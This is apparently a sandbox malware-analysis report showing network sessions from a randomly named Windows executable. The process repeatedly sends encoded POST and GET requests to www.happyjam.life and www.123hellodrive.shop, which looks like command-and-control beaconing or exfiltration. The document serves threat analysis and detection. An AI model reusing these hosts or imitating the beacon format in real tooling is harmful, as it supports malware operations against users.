                                                                                14192.168.2.549965209.74.77.107806008C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 14, 2024 13:51:06.195230961 CET760OUTPOST /4t49/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.happyjam.life
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Origin: http://www.happyjam.life
                                                                                Referer: http://www.happyjam.life/4t49/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 6e 51 38 30 78 47 64 33 32 38 6d 78 6a 34 47 64 65 65 65 48 62 30 6e 4e 38 6d 5a 74 69 64 34 65 79 2b 6c 49 4b 6b 35 54 72 4e 39 6b 47 4d 4a 71 4c 45 4d 61 2f 64 48 59 6e 66 75 63 2f 56 49 6a 30 33 63 6b 57 79 4e 35 75 33 4e 53 35 71 48 5a 58 6f 7a 63 2f 46 42 57 69 6d 49 43 65 6d 57 7a 74 59 4f 63 4c 42 66 6e 54 4b 31 31 77 6d 4a 63 4c 4f 47 6a 4e 71 49 45 4d 59 32 4f 32 49 37 42 42 6e 71 69 36 42 63 31 47 53 61 4b 30 67 79 5a 52 32 6e 69 4b 4d 59 68 4c 62 42 6b 56 79 4a 79 30 44 79 67 46 4f 2f 44 68 50 38 4b 53 4d 76 30 41 6c 41 41 73 41 69 4f 46 55 5a 63 74 43 69 79 71 30 2f 62 76 32 77 4a 46 59 32 42 4a 59 36 4d 55 6f 30 68 78 38 46 64 62 4b 65 73
                                                                                Data Ascii: NVK8=nQ80xGd328mxj4GdeeeHb0nN8mZtid4ey+lIKk5TrN9kGMJqLEMa/dHYnfuc/VIj03ckWyN5u3NS5qHZXozc/FBWimICemWztYOcLBfnTK11wmJcLOGjNqIEMY2O2I7BBnqi6Bc1GSaK0gyZR2niKMYhLbBkVyJy0DygFO/DhP8KSMv0AlAAsAiOFUZctCiyq0/bv2wJFY2BJY6MUo0hx8FdbKes
                                                                                Dec 14, 2024 13:51:07.403924942 CET533INHTTP/1.1 404 Not Found
                                                                                Date: Sat, 14 Dec 2024 12:51:07 GMT
                                                                                Server: Apache
                                                                                Content-Length: 389
                                                                                Connection: close
                                                                                Content-Type: text/html
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                15192.168.2.549974209.74.77.107806008C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 14, 2024 13:51:08.861866951 CET1777OUTPOST /4t49/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.happyjam.life
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Origin: http://www.happyjam.life
                                                                                Referer: http://www.happyjam.life/4t49/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 6e 51 38 30 78 47 64 33 32 38 6d 78 6a 34 47 64 65 65 65 48 62 30 6e 4e 38 6d 5a 74 69 64 34 65 79 2b 6c 49 4b 6b 35 54 72 4e 31 6b 47 35 64 71 52 6a 77 61 2b 64 48 59 70 2f 75 42 2f 56 49 69 30 33 45 6f 57 79 41 43 75 31 31 53 2f 4a 2f 5a 41 71 62 63 73 6c 42 57 71 47 49 42 54 47 58 7a 74 59 2b 41 4c 42 76 6e 54 4b 31 31 77 6c 52 63 50 61 71 6a 4c 71 49 4c 62 6f 32 53 79 49 37 70 42 6a 2b 63 36 42 51 6c 48 6d 6d 4b 30 41 69 5a 64 6c 50 69 46 4d 59 6e 49 62 42 43 56 79 55 79 30 44 76 54 46 4f 4b 65 68 4e 73 4b 57 34 69 4f 51 58 41 45 33 53 75 6a 50 30 42 75 36 45 4b 53 6a 43 6a 4e 72 47 55 32 4b 71 6d 4a 66 63 2b 79 5a 34 6c 52 72 61 4e 70 63 64 6e 38 46 44 39 61 43 77 78 74 61 61 66 7a 7a 49 64 64 72 66 37 58 66 6f 46 30 36 36 44 63 59 32 79 53 46 6d 4f 75 42 6f 49 33 48 56 44 55 2b 55 7a 70 74 68 70 74 36 63 6e 36 51 46 6f 4c 48 4f 31 56 78 64 74 34 65 63 63 36 32 61 71 53 61 52 36 48 58 72 72 4c 6a 49 76 79 79 53 59 37 64 34 53 53 39 6c 45 6e 52 48 30 4a 70 61 31 75 2f 78 6c 63 34 [TRUNCATED]
                                                                                Data Ascii: NVK8=nQ80xGd328mxj4GdeeeHb0nN8mZtid4ey+lIKk5TrN1kG5dqRjwa+dHYp/uB/VIi03EoWyACu11S/J/ZAqbcslBWqGIBTGXztY+ALBvnTK11wlRcPaqjLqILbo2SyI7pBj+c6BQlHmmK0AiZdlPiFMYnIbBCVyUy0DvTFOKehNsKW4iOQXAE3SujP0Bu6EKSjCjNrGU2KqmJfc+yZ4lRraNpcdn8FD9aCwxtaafzzIddrf7XfoF066DcY2ySFmOuBoI3HVDU+Uzpthpt6cn6QFoLHO1Vxdt4ecc62aqSaR6HXrrLjIvyySY7d4SS9lEnRH0Jpa1u/xlc4bUIgJd4lomR8Yywk/Tekq3mL4UjyiMGT2IoTRz4MdK3dNf9Iqg1jLvAEmAasNCMiYZLx/mhelAYKY4bRJB6wc6HBi7YPq/ZaKXgcwwYMioh5ECiTlYdT27ZZq/JKOnNBi5yDQYRjLmz0v5oj65ZHZSxbu/6o/Tw6t1ilyHRz8xyY/D5KTabwz5jHV/ZPrWqAc+fG9Wokw3MG9Tn71GFcKxSwrovSYRnVrXaNIffOuiQU6A6FKF7WWfy1bCfVQuQs6HceEAhLoT96U1n2CJXUn0YVsxk+0kbsFaNV/41Gd6WyCGewrCownwxXr70ptal3MaWoWjMiwwfN+sgABbVdRJiw5GhZcCe5COLE9acb6dpxtry88sNfQYmWDI116k2ZxpbAvUgpE1rZPHBce7IYAukiwac8A5vIs4CkUsV8nM2gvJwlGJJrykm2nEF0ZON9+4kaNXnSqNqlWkcULyEeHsyq+rKyVh8MsFB+HlgC4VxinJwvmuxR8khdK7Hd91tiSP6Z/33SUOP2mOv1HUpEkb1itZG6LuSXoUs9en+VAnHAVjj8htbOAnWzV4bnaeJ8hs7RhMvxj5bLI6qj/SMy3BZ9k1xOJHVv9YHW2ULy8L697HrVOjpZgW4E0OUfVE93eLv+0KCWp8xm8kNpG8j7wRrL1sYSKke78W [TRUNCATED]
                                                                                Dec 14, 2024 13:51:10.137029886 CET533INHTTP/1.1 404 Not Found
                                                                                Date: Sat, 14 Dec 2024 12:51:09 GMT
                                                                                Server: Apache
                                                                                Content-Length: 389
                                                                                Connection: close
                                                                                Content-Type: text/html
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                16192.168.2.549981209.74.77.107806008C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 14, 2024 13:51:11.525719881 CET482OUTGET /4t49/?NVK8=qSUUy2RUpcHfgeDYScePJkyQ5UV89Z0x3ukWI3F+j71sN74kYD8q/afbxdu8+w0uynd4aRJgg192nr/hQaDB6X5vsGIHc1mVtIO2AR3GSaQwpWdADtOmAN4eNIbS06uucA==&V6T=lB24KzN0lF-8 HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.happyjam.life
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Dec 14, 2024 13:51:12.742244959 CET548INHTTP/1.1 404 Not Found
                                                                                Date: Sat, 14 Dec 2024 12:51:12 GMT
                                                                                Server: Apache
                                                                                Content-Length: 389
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                17192.168.2.54999884.32.84.32806008C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 14, 2024 13:51:18.548563004 CET755OUTPOST /vc3u/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.123hellodrive.shop
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Origin: http://www.123hellodrive.shop
                                                                                Referer: http://www.123hellodrive.shop/vc3u/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 4d 4b 62 75 31 48 4c 46 45 37 69 35 38 68 5a 57 4e 4e 74 73 6b 78 49 74 63 6d 63 45 61 71 65 54 64 37 53 64 6f 31 31 76 53 5a 4c 6d 6d 50 4f 51 7a 33 4a 6f 6c 67 46 4f 53 6e 7a 53 7a 73 67 33 73 58 32 36 54 56 65 46 62 37 37 34 48 59 55 39 68 74 73 58 56 6c 74 57 61 43 4a 4f 48 65 63 52 4d 4b 61 2b 6f 2b 6a 6c 73 71 44 56 70 49 2f 36 55 55 52 67 55 47 58 4c 30 4e 6b 7a 79 4d 52 32 45 49 79 48 54 4b 6b 7a 6d 2b 6d 71 79 61 64 57 38 46 72 53 67 46 6b 38 79 68 44 52 68 62 45 53 4a 54 53 6c 55 59 72 67 59 32 52 47 42 2f 6a 62 51 72 53 63 70 42 63 39 56 47 75 2f 41 32 63 6e 30 42 50 4c 59 44 34 3d
                                                                                Data Ascii: NVK8=MKbu1HLFE7i58hZWNNtskxItcmcEaqeTd7Sdo11vSZLmmPOQz3JolgFOSnzSzsg3sX26TVeFb774HYU9htsXVltWaCJOHecRMKa+o+jlsqDVpI/6UURgUGXL0NkzyMR2EIyHTKkzm+mqyadW8FrSgFk8yhDRhbESJTSlUYrgY2RGB/jbQrScpBc9VGu/A2cn0BPLYD4=


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                18192.168.2.55000484.32.84.32806008C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 14, 2024 13:51:21.220568895 CET775OUTPOST /vc3u/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.123hellodrive.shop
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Origin: http://www.123hellodrive.shop
                                                                                Referer: http://www.123hellodrive.shop/vc3u/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 4d 4b 62 75 31 48 4c 46 45 37 69 35 39 43 42 57 4d 73 74 73 78 42 49 75 51 47 63 45 50 61 65 58 64 37 75 64 6f 33 5a 2f 53 72 76 6d 6a 64 47 51 39 54 39 6f 6f 41 46 4f 48 58 7a 74 33 73 67 38 73 58 36 55 54 51 32 46 62 37 2f 34 48 5a 6b 39 68 65 30 55 54 6c 74 49 53 69 4a 4d 49 2b 63 52 4d 4b 61 2b 6f 2b 6d 34 73 72 72 56 6f 34 50 36 53 31 52 2f 5a 6d 58 4b 6a 39 6b 7a 32 4d 52 49 45 49 79 31 54 49 51 4b 6d 34 69 71 79 66 78 57 35 48 53 67 35 31 6b 79 78 52 43 68 69 4f 6f 58 50 46 4f 6e 49 71 75 67 59 31 64 6e 4e 70 53 78 4b 4a 61 30 36 68 77 46 46 56 6d 49 52 47 39 4f 75 69 66 37 47 55 75 35 4d 48 42 72 76 47 75 5a 6c 64 63 53 49 56 39 79 69 5a 41 35
                                                                                Data Ascii: NVK8=MKbu1HLFE7i59CBWMstsxBIuQGcEPaeXd7udo3Z/SrvmjdGQ9T9ooAFOHXzt3sg8sX6UTQ2Fb7/4HZk9he0UTltISiJMI+cRMKa+o+m4srrVo4P6S1R/ZmXKj9kz2MRIEIy1TIQKm4iqyfxW5HSg51kyxRChiOoXPFOnIqugY1dnNpSxKJa06hwFFVmIRG9Ouif7GUu5MHBrvGuZldcSIV9yiZA5


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                19192.168.2.55001284.32.84.32806008C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 14, 2024 13:51:23.895442963 CET1792OUTPOST /vc3u/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.123hellodrive.shop
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Origin: http://www.123hellodrive.shop
                                                                                Referer: http://www.123hellodrive.shop/vc3u/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 4d 4b 62 75 31 48 4c 46 45 37 69 35 39 43 42 57 4d 73 74 73 78 42 49 75 51 47 63 45 50 61 65 58 64 37 75 64 6f 33 5a 2f 53 72 6e 6d 2f 34 53 51 39 79 39 6f 70 41 46 4f 62 48 7a 57 33 73 67 68 73 58 79 51 54 51 37 77 62 34 4c 34 56 72 38 39 6e 76 30 55 47 56 74 49 4e 53 4a 4a 48 65 63 49 4d 4b 4b 6c 6f 2b 32 34 73 72 72 56 6f 36 58 36 52 6b 52 2f 4b 57 58 4c 30 4e 6b 2f 79 4d 52 7a 45 49 4c 43 54 49 55 61 6d 4c 71 71 79 2b 64 57 37 55 71 67 6d 46 6b 77 34 42 43 35 69 4f 74 48 50 42 75 4e 49 72 61 61 59 31 56 6e 49 2b 2f 73 58 36 2b 4f 6e 41 6b 30 4a 32 32 6c 45 43 78 74 67 43 36 42 43 44 47 45 47 45 6b 41 68 32 61 70 68 4f 5a 5a 58 6b 46 66 6a 4e 74 6d 44 70 50 55 54 54 56 37 63 46 52 78 48 52 70 6f 70 32 53 43 6d 48 47 4b 73 59 72 34 4f 4d 6f 43 44 44 74 51 6d 70 74 4d 77 53 4f 73 39 66 61 7a 46 78 53 38 49 57 61 75 44 4d 68 47 75 75 31 47 48 2f 6d 63 54 69 6e 58 45 55 78 42 50 4e 4f 44 55 34 73 67 43 33 43 55 4b 4e 32 66 5a 68 57 4e 37 62 76 4b 76 35 4e 42 42 68 4f 49 2f 37 2b 4d 7a [TRUNCATED]
                                                                                Data Ascii: NVK8=MKbu1HLFE7i59CBWMstsxBIuQGcEPaeXd7udo3Z/Srnm/4SQ9y9opAFObHzW3sghsXyQTQ7wb4L4Vr89nv0UGVtINSJJHecIMKKlo+24srrVo6X6RkR/KWXL0Nk/yMRzEILCTIUamLqqy+dW7UqgmFkw4BC5iOtHPBuNIraaY1VnI+/sX6+OnAk0J22lECxtgC6BCDGEGEkAh2aphOZZXkFfjNtmDpPUTTV7cFRxHRpop2SCmHGKsYr4OMoCDDtQmptMwSOs9fazFxS8IWauDMhGuu1GH/mcTinXEUxBPNODU4sgC3CUKN2fZhWN7bvKv5NBBhOI/7+Mze4I2GoHc6fs6DKecBb+FCTUm08YH/OZNleGPNrIu/R0qS+AIbN+cDsAFtmFIfFqTDPemdGJrS0KzM4pHQKmH/i0AdTWWXDejB1rHOuq747sG1Q7KTA2mfKSC83yQW28CucdUd6EH716ujwPex6/av8Eipnrxa96s2E+pXFYifuqFD23Q7Kvisn5rAgpHFRLTDUDQ1eFgEK6ById7NAUPBbDLh0hU3RNY1yrzka1JgqtCIhbt4FKKvmo6NDzZC8cIsN+WIwySzNzGzKA8zExxJNKKNofZT971Lwkp0/iP6hCGe7wi8XpGgnbQ58jkLRId7R78m3DoazA9Hm/b/ahtWknu1Ez4+oFe1l35Jm7kG4MUIY7VcUN9SA/EXyZS6woedRWuTu7zIizltxz0lmP3+RKAqco7taTQ17OQIKrCFnw6bw72CWvcw9Ww7iY1zOqwMiFqFyCFfiiXYxlya7pOuPTF9ilVaN4+YHLCRTJDBnWn9DrzyzAChIf7AUXQhoFL2Tkb/roZp+ndPW0bt58hxrhIkGkZG+n5X+9fPxpw5GJPOHajTdDQhrzyW6SYq8d/LNJWrJAhxyZ2037ZSZlfShse59PUL3wBZ3tk62Vzzcrir/UX93XhgzKGZwcRJY8ZZS3fCbnT6vB208W+28oxg4jeh2ITCOV7Bh [TRUNCATED]


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                20192.168.2.55002084.32.84.32806008C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 14, 2024 13:51:26.562583923 CET487OUTGET /vc3u/?NVK8=BIzO2x/CParM8yIJPtdG01YaZAIKO+ejS6SUxHNGTKrV1frM7wJkom86Bn77y9QMlkCGGhfkfqeUHrw85/0eQ2l+TkULL/wTF5DWx+rJ04uuxIumVF9zXUy61c1Y+8cRSQ==&V6T=lB24KzN0lF-8 HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.123hellodrive.shop
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Dec 14, 2024 13:51:27.644532919 CET1236INHTTP/1.1 200 OK
                                                                                Date: Sat, 14 Dec 2024 12:51:27 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 9973
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Server: hcdn
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                x-hcdn-request-id: 1762f02786abcded6699fc37c9942832-bos-edge1
                                                                                Expires: Sat, 14 Dec 2024 12:51:26 GMT
                                                                                Cache-Control: no-cache
                                                                                Accept-Ranges: bytes
                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                                                Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"O
                                                                                Dec 14, 2024 13:51:27.644563913 CET1236INData Raw: 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63
                                                                                Data Ascii: pen Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!
                                                                                Dec 14, 2024 13:51:27.644582033 CET1236INData Raw: 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63
